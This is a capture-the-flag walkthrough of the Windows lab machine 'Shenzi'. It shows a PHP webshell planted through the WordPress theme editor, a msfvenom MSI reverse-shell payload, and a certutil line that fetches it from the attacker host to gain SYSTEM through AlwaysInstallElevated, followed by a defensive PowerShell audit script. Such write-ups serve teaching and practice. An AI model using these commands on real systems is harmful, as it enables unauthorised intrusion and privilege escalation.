Shenzi
Source: Proving Grounds
OS: Windows
Community Rating: Hard
Enumeration & Reconnaissance
Started with the usual autorecon and was literally bombarded with open ports: FTP (21), HTTP (80), RPC (135), SMB (139), HTTP (443), SMB (445), MySQL (3306), 5040, 7680, 49664 -> 49669
Service Analysis
FTP was configured to not allow anonymous access, so nothing could be done there for now.
I then started with HTTP (80). It displayed XAMPP’s default page.

When I tried to access phpMyAdmin, I received the message:
"New XAMPP security concept: Access to the requested directory is only available from the local network."

I searched online for a quick bypass in case there was an easy workaround, but nothing was found, so I moved on. HTTP (443) was just a replica of HTTP (80), and the fuzzers didn’t expose anything of value either.
I then moved on to SMB. The autorecon output and enum4linux showed nothing, but smbclient revealed a share named Shenzi.

I connected to the share using:
smbclient //192.168.213.55/Shenzi

Inside, I found a passwords.txt file:
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:
(means no password!)
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
5) WordPress:
User: admin
Password: FeltHeadwallWight357
Most of these were XAMPP defaults, except the WordPress password, which wasn’t. That should have hinted at something.
However, I couldn’t find any WordPress site; even the fuzzers didn't expose one. I tried the credentials on FTP with no luck and kept going in circles. I started looking for hints, and that's where the name of the box/user came in handy: the WordPress site is deployed under the username,
http://192.168.213.55/shenzi/
That's what I hate about CTFs in general: this kind of guessing enumeration.

Gaining Initial Access
Since I already had the admin credentials for WordPress, I didn’t run wpscan. I logged in and checked if I could inject a shell into the PHP files. I went to Appearance > Theme Editor, chose a PHP file (I tested with 404.php), and injected a basic webshell:
if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }

When that worked, I uploaded Ivan Sincek’s shell, which provided a reverse shell.

Privilege Escalation
Once inside, I ran the basic
whoami /priv
and then uploaded WinPEAS. WinPEAS exposed that:
AlwaysInstallElevated is set to 1 in HKLM
AlwaysInstallElevated is set to 1 in HKCU

This means any MSI package installed on the box, even by a low-privileged user, runs with SYSTEM privileges. I then created an MSI shell using msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=8811 -f msi -o shell.msi
I then uploaded and executed it:
certutil -urlcache -split -f http://192.168.45.170:901/shell.msi
.\shell.msi
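
As a defensive counterpart, here is an added PowerShell audit (my own script, not part of the original writeup) that reads the two registry values WinPEAS flagged, reports whether the combination is actually exploitable, lists recent MSI installs as a detection lead, and can clear the setting. The registry paths and the MsiInstaller event ID are real; the script name and the -Fix switch are my own.

```powershell
# Check-AlwaysInstallElevated.ps1 (added example, not from the original writeup)
# Usage: .\Check-AlwaysInstallElevated.ps1        (report only)
#        .\Check-AlwaysInstallElevated.ps1 -Fix   (clear both values; HKLM needs admin)
param([switch]$Fix)

# The two policy locations Windows Installer consults for AlwaysInstallElevated.
$Paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevated {
    # Returns a hashtable hive -> value; a missing key or value counts as 0.
    $result = @{}
    foreach ($p in $Paths) {
        $hive = $p.Split(':')[0]
        $v = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated `
                -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $result[$hive] = if ($null -eq $v) { 0 } else { [int]$v }
    }
    return $result
}

$state = Get-AlwaysInstallElevated
$state.GetEnumerator() | ForEach-Object { "{0}: AlwaysInstallElevated = {1}" -f $_.Key, $_.Value }

# Windows Installer only honours the policy when BOTH hives are set to 1;
# a single hive set on its own is not exploitable, so alert only on the pair.
$exploitable = ($state['HKLM'] -eq 1) -and ($state['HKCU'] -eq 1)
if ($exploitable) {
    Write-Warning 'AlwaysInstallElevated is set in HKLM and HKCU: any user can install an MSI as SYSTEM.'
    # Detection lead: MsiInstaller writes event 1033 to the Application log for
    # every completed install; unexpected products or installing accounts stand out.
    Get-WinEvent -FilterHashtable @{LogName='Application'; ProviderName='MsiInstaller'; Id=1033} `
        -MaxEvents 20 -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, UserId, @{n='Message'; e={ $_.Message.Split("`n")[0] }}
} else {
    'AlwaysInstallElevated is not exploitable on this host.'
}

if ($Fix) {
    foreach ($p in $Paths) {
        if (Test-Path $p) { Set-ItemProperty -Path $p -Name AlwaysInstallElevated -Value 0 -Type DWord }
    }
    'Both values set to 0 (a domain GPO that enables the policy will re-apply it on the next refresh).'
}
```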

Lessons Learned
Always check for shares; in this case, the Shenzi share contained a passwords file that was key to moving forward.
Sometimes, manual guess-work (like identifying the WordPress site via the username) is necessary when automated tools or fuzzers yield nothing. (I hate it)
Injecting a shell via the theme editor in WordPress is an easy way to gain initial access.
The AlwaysInstallElevated setting in both HKLM and HKCU is a reliable privilege escalation vector on Windows.